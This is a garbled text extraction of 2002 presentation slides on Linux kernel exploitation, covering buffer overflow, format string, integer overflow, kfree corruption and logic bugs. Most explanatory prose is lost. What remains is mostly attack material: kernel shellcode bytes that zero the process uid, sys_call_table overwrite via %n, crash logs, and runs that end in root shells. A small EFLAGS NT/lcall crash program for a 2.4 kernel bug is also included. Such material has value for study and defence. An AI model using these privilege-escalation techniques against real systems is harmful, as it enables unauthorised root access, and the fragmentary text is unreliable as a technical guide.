Linux kernel exploit研究和探索

Linux kernel exploit DOC alert7 <alert7@xfocus.org> PPT e4gle <e4gle@whitecell.org> 2002-12-2 1

2002-12-2 2

Linux kernel exploit kernel exploit exploit exploit exploit (Kernel Buffer Overflow) (Kernel Format String vulnerability) (Kernel Integer Overflow) kfree() (Kernel Kfree Parameter Corruption) (Kernel Program Logic Vulnerability) TCP/IP 2002-12-2 3

shellcode exploit exploit mail alert7@xfocus.org e4gle@whitecell.org 2002-12-2 4

kernel exploit Linux kernel ring0 kernel 0 uid=0 uid=0 kernel linux 2002-12-2 5

exploit 2002-12-2 6

exploit linux 2002-12-2 7

exploit INT TSS SS ESP SS ESP EFLAGS CS EIP ( ) IDT CS EIP 2002-12-2 8

exploit ESP task static inline struct task_struct * get_current(void) { } struct task_struct *current; asm ("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL)); return current; #define current get_current() 2002-12-2 9

exploit CPU 2002-12-2 10

exploit kernel BOF kernel format string vul (kernel integer overflow) kfree() (kernel kfree parameter corruption) kernel program logic error TCP/IP 2002-12-2 11

exploit 2002-12-2 12

Kernel Buffer OverFlow kbof.c lkm kbof.c [root@redhat73 test]# gcc -O3 -c -I/usr/src/linux/include kbof.c [root@redhat73 test]# insmod -f kbof.o Warning: kernel-module version mismatch kbof.o was compiled for kernel version 2.4.18-3custom while this kernel is version 2.4.18-3 Warning: loading kbof.o will taint the kernel: no license Warning: loading kbof.o will taint the kernel: forced load [root@redhat73 test]# lsmod grep kbof kbof 1040 0 (unused) 2002-12-2 13

Kernel Buffer OverFlow Kernel BOF RETLOC RETADDR shellcode Shellcode 2002-12-2 14

Kernel Buffer OverFlow RETLOC kbof_exploit1.c [alert7@redhat73 alert7]$./kbof_exploit1 Segmentation fault kbof_exploit, oops 2002-12-2 15

Kernel Buffer OverFlow OOPS Oct 24 09:33:19 redhat73 kernel: Unable to handle kernel paging request at virtual address 41414141 Oct 24 09:33:19 redhat73 kernel: printing eip: Oct 24 09:33:19 redhat73 kernel: 41414141 Oct 24 09:33:19 redhat73 kernel: *pde = 00000000 Oct 24 09:33:19 redhat73 kernel: Oops: 0000 Oct 24 09:33:19 redhat73 kernel: kbof pcnet32 mii usb-uhci usbcore BusLogic sd_mod scsi_mod Oct 24 09:33:19 redhat73 kernel: CPU: 0 Oct 24 09:33:19 redhat73 kernel: EIP: 0010:[<41414141>] Tainted: PF Oct 24 09:33:19 redhat73 kernel: EFLAGS: 00000282 Oct 24 09:33:19 redhat73 kernel: Oct 24 09:33:19 redhat73 kernel: EIP is at Using_Versions [] 0x41414140 (2.4.18-3) Oct 24 09:33:19 redhat73 kernel: eax: 00000400 ebx: c3877c00 ecx: 00000000 edx: bffffb60 Oct 24 09:33:19 redhat73 kernel: esi: 41414141 edi: 41414141 ebp: 41414141 esp: c18effa4 Oct 24 09:33:19 redhat73 kernel: ds: 0018 es: 0018 ss: 0018 Oct 24 09:33:19 redhat73 kernel: Process kbof_exploit (pid: 694, stackpage=c18ef000) Oct 24 09:33:19 redhat73 kernel: Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Oct 24 09:33:19 redhat73 kernel: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Oct 24 09:33:19 redhat73 kernel: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Oct 24 09:33:19 redhat73 kernel: Call Trace: Oct 24 09:33:19 redhat73 kernel: Oct 24 09:33:19 redhat73 kernel: Code: Bad EIP value. 2002-12-2 16

Kernel Buffer OverFlow objdump kbof 00000000 <test>: 0: 55 push %ebp 1: 89 e5 mov %esp,%ebp 3: 57 push %edi 4: 56 push %esi 5: 81 ec 00 01 00 00 sub $0x100,%esp b: 8b 45 08 mov 0x8(%ebp),%eax e: 89 c1 mov %eax,%ecx 10: 8b 75 0c mov 0xc(%ebp),%esi 13: 8d bd f8 fe ff ff lea 0xfffffef8(%ebp),%edi 19: c1 e9 02 shr $0x2,%ecx 1c: f3 a5 repz movsl %ds:(%esi),%es:(%edi) 1e: a8 02 test $0x2,%al 20: 74 02 je 24 <test+0x24> 22: 66 a5 movsw %ds:(%esi),%es:(%edi) 24: a8 01 test $0x1,%al 26: 74 01 je 29 <test+0x29> 28: a4 movsb %ds:(%esi),%es:(%edi) 29: 81 c4 00 01 00 00 add $0x100,%esp 2f: 5e pop %esi 30: 5f pop %edi 31: 5d pop %ebp 32: c3 ret 33: 90 nop 2002-12-2 17

Kernel Buffer OverFlow EIP,EBP ESP new_function xxxx EIP EBP EDI ESI BUF[256] ( ) code len 2002-12-2 ( ) 18 s+4 ebp s 256 bytes

Kernel Buffer OverFlow retloc code[256+8+4] kbof_exploit1.c, code[256+8+4] B [alert7@redhat73 alert7]$./kbof_exploit2 Segmentation fault 2002-12-2 19

Kernel Buffer OverFlow Oct 24 10:11:10 redhat73 kernel: <1>Unable to handle kernel paging request at virtual address 42424242 Oct 24 10:11:10 redhat73 kernel: printing eip: Oct 24 10:11:10 redhat73 kernel: 42424242 Oct 24 10:11:10 redhat73 kernel: *pde = 00000000 Oct 24 10:11:10 redhat73 kernel: Oops: 0000 Oct 24 10:11:10 redhat73 kernel: kbof pcnet32 mii usb-uhci usbcore BusLogic sd_mod scsi_mod Oct 24 10:11:10 redhat73 kernel: CPU: 0 Oct 24 10:11:10 redhat73 kernel: EIP: 0010:[<42424242>] Tainted: PF Oct 24 10:11:10 redhat73 kernel: EFLAGS: 00000282 Oct 24 10:11:10 redhat73 kernel: Oct 24 10:11:10 redhat73 kernel: EIP is at Using_Versions [] 0x42424241 (2.4.18-3) Oct 24 10:11:10 redhat73 kernel: eax: 00000110 ebx: c2a69e00 ecx: 00000000 edx: bffff870 Oct 24 10:11:10 redhat73 kernel: esi: 41414141 edi: 41414141 ebp: 41414141 esp: c2ba1fa4 Oct 24 10:11:10 redhat73 kernel: ds: 0018 es: 0018 ss: 0018 Oct 24 10:11:10 redhat73 kernel: Process kbof_exploit (pid: 730, stackpage=c2ba1000) Oct 24 10:11:10 redhat73 kernel: Stack: 00000110 c2a69e00 00000110 c2a69e00 c2ba0000 40013020 bffff738 c0108923 Oct 24 10:11:10 redhat73 kernel: 00000110 bffff760 00000000 40013020 bffffbd4 bffff738 000000f0 0000002b Oct 24 10:11:10 redhat73 kernel: 0000002b 000000f0 080484f8 00000023 00000286 bffff730 0000002b Oct 24 10:11:10 redhat73 kernel: Call Trace: [<c0108923>] system_call [kernel] 0x33 Oct 24 10:11:10 redhat73 kernel: Oct 24 10:11:10 redhat73 kernel: Oct 24 10:11:10 redhat73 kernel: Code: Bad EIP value. EIP 0X42424242(B) 2002-12-2 20

Kernel Buffer OverFlow RETADDR shellcode, 2002-12-2 21

Kernel Buffer OverFlow SHELLCODE ESP TASK uid=0 0xb8,0x00,0xe0,0xff,0xff, /*mov $0xffffe000,%eax*/ 0x21,0xe0, /*and %esp,%eax*/ 0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00, /*movl $0x0,0x128(%eax) */ 2002-12-2 22

Kernel Buffer OverFlow retloc retaddr kbof_exploit2.c 2002-12-2 23

Kernel Buffer OverFlow ROOT shell, 2002-12-2 24

Kernel Buffer OverFlow uid 0 UID 0 kbof_exploit3.c 2002-12-2 25

Kernel Buffer OverFlow #define alloc_task_struct() ((struct task_struct *) get_free_pages(gfp_kernel,1)) iret esp 2002-12-2 26

Kernel Buffer OverFlow iret 0xc31e9fa4: 0x00000110 0xc3168000 0x00000110 0xc3168000 0xc31e9fb4: 0xc31e8000 0x40013020 0xbffff738 0xc0108923 0xc31e9fc4: 0x00000110 0xbffff760 0x00000000 0x40013020 0xc31e9fd4: 0xbffffbd4 0xbffff738 0x000000f0 0x0000002b 0xc31e9fe4: 0x0000002b 0x000000f0 0x0804859c 0x00000023 0xc31e9ff4: 0x00000286 0xbffff730 0x0000002b 0x00000000 0x8048xx 0x00000023 EIP CS OK 0x00000023 kbof_exploit4.c 2002-12-2 27

Kernel Buffer OverFlow [alert7@redhat73 alert7]$./kbof_exploit5 code addr is:0xbffff760 Segmentation fault (core dumped) 2002-12-2 28

Kernel Buffer OverFlow #0 0x080485ce in new_function () (gdb) i reg eax 0xc298ffec -1030160404 ecx 0x0 0 edx 0xbffff870-1073743760 ebx 0x23 35 esp 0xbffff730 0xbffff730 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x80485ce 0x80485ce eflags 0x286 646 cs 0x23 35 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) x/i $eip 0x80485ce <new_function+22>: mov %eax,0xfffffff8(%ebp) EBP kbof_exploit5.c 2002-12-2 29

Kernel Buffer OverFlow [alert7@redhat73 alert7]$./kbof_exploit6 code addr is:0xbffff760 Segmentation fault (core dumped) 2002-12-2 30

Kernel Buffer OverFlow eax 0x1 1 ecx 0x42130f08 1108545288 edx 0xbffffbdc -1073742884 ebx 0x4213030c 1108542220 esp 0xbffffb68 0xbffffb68 ebp 0xbffffb68 0xbffffb68 esi 0x40013020 1073819680 edi 0xbffffbd4-1073742892 eip 0x80483d3 0x80483d3 eflags 0x292 658 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 ds es 2002-12-2 31

Kernel Buffer OverFlow [alert7@redhat73 alert7]$./kbof_exploit7 code addr is:0xbffff760 sh-2.05a# id uid=0(root) gid=500(alert7) groups=500(alert7) 2002-12-2 32

kformat.c 2002-12-2 33

kernel format string vuln exploit kernel printf() %n RETLOC RETADDR 2002-12-2 34

kernel printf() %n kernel src %n %hn $ 2002-12-2 35

RETLOC KERNEL RETLOC head.s 2002-12-2 36

ENTRY(system_call) pushl %eax # save orig_eax SAVE_ALL GET_CURRENT(%ebx) testb $0x02,tsk_ptrace(%ebx) # PT_TRACESYS jne tracesys cmpl $(NR_syscalls),%eax jae badsys call *SYMBOL_NAME(sys_call_table)(,%eax,4) movl %eax,eax(%esp) # save the return value ENTRY(ret_from_sys_call) cli # need_resched and signals atomic test cmpl $0,need_resched(%ebx) jne reschedule cmpl $0,sigpending(%ebx) jne signal_return restore_all: RESTORE_ALL sys_call_table /porc/ksyms 2002-12-2 37

[alert7@redhat73 alert7]$ cat /proc/ksyms grep sys_call_table c02c209c sys_call_table_rdfdb18bd 241 sys_call_table+241*4 SHELLCODE 2002-12-2 38

SHELLCODE %hn shellcode mmap() ld 0x08048000 0 2002-12-2 39

kformat_exploit1.c 2002-12-2 40

retloc %len%n retloc sys_call_table+241*4 c02c209c sys_call_table_rdfdb18bd retloc 0xC02C2460 shellcode shellcode_addr len shellcode_addr-4 2002-12-2 41

[alert7@redhat73 alert7]$./kformat_exploit shellcode addr is:0x17ae shell addr is 0x1780 `$,?6058p%nsh-2.05a# id uid=0(root) gid=500(alert7) groups=500(alert7) sh-2.05a# Ok 2002-12-2 42

kinteger.c len if (len > 256) len = 256; strncpy_from_user LEN exploit kinteger_exploit.c [alert7@redhat73 alert7]$./kinteger_exploit sh-2.05a# id uid=0(root) gid=500(alert7) groups=500(alert7) 2002-12-2 43

kfree() kfree.c kfree() kfree() exploit kfree() 2002-12-2 44

BUGTRAQ ID 6115 kernel 2.4.x Linux TF linux lcall7, lcall27, EFLAGS NT TF 2002-12-2 45

Exploit #define MSUX "mov $0x100,%eax\npushl %eax\nmov $0x1,%eax\npopfl\nlcall $7,$0" redhat 7.3 //int NT_MASK = 0x00004000; int main( void ) { asm (" mov $0x00004000,%eax # NT pushl %eax popfl lcall $7,$0 "); return 1; } 2002-12-2 46

2002-12-2 47 EFLAGS EFLAGS NT TF 0 EFLAGS NT TF EFLAGS NT 1 lcall NT 1 IRET TSS

TCP/IP TCP/IP Tcp/ip exploit BH 2002-12-2 48

TCP/IP TCP/IP exploit RETLOC SHELLCODE SHELLCODE 1 RETLOC 2 SHELLCODE2 SHELLCODE2 2002-12-2 49

TCP/IP kipstack.c 1 80386 2 linux kernel 2.4.18 3 http://www.linuxforum.net 4 LSD kernvuln-1.0.2 http://lsd-pl.net/ 2002-12-2 50

2002-12-2 51